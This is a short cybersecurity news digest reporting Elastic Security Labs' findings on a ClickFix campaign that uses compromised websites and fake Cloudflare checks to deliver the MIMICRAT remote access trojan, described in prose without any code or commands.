• ClickFix Campaign Abuses Compromised Sites to Deploy MIMICRAT Malware Cybersecurity researchers have disclosed details of a newClickFixcampaign that abuses compromised legitimate sites to deliver a previously undocumented remote access trojan (RAT) calledMIMICRAT(aka AstarionRAT). • “The campaign demonstrates a high level of operational sophistication: compromised sites spanning multiple industries and geographies serve as delivery infrastructure, a multi-stage PowerShell chain performs ETW and AMSI bypass before dropping a Lua-scripted shellcode loader, and the final implant communicates over HTTPS on port 443 using HTTP profiles that resemble legitimate web analytics traffic,” Elastic Security Labssaidin a Friday report. • According to the enterprise search and cybersecurity company, MIMICRAT is a custom C++ RAT with support for Windows token impersonation, SOCKS5 tunneling, and a set of 22 commands for comprehensive post-exploitation capabilities. • The campaign was discovered earlier this month. • It’s also assessed toshare tactical and infrastructural overlapswith another ClickFix campaign documented by Huntress that leads to the deployment of the Matanbuchus 3.0 loader, which then serves as a conduit for the same RAT. • The end goal of the attack is suspected to be ransomware deployment or data exfiltration.

Article Summaries:

  • Cybersecurity researchers uncovered a sophisticated ClickFix campaign that uses compromised legitimate websites to deliver a previously unknown remote‑access trojan, MIMICRAT (also known as AstarionRAT). The attack chain begins with malicious JavaScript injected into the BIN validation service bincheck.io, which serves a fake Cloudflare verification page and prompts users to run a PowerShell command. The command downloads a second‑stage script that bypasses Windows event logging and antivirus checks before dropping a Lua‑based loader that injects MIMICRAT in memory. The RAT communicates over HTTPS on port 443, supports token impersonation, SOCKS5 tunneling, and offers 22 post‑exploitation commands. The campaign targets multiple industries and languages, with victims reported in the U.S. and China, and is believed to aim at ransomware or data exfiltration.

Sources: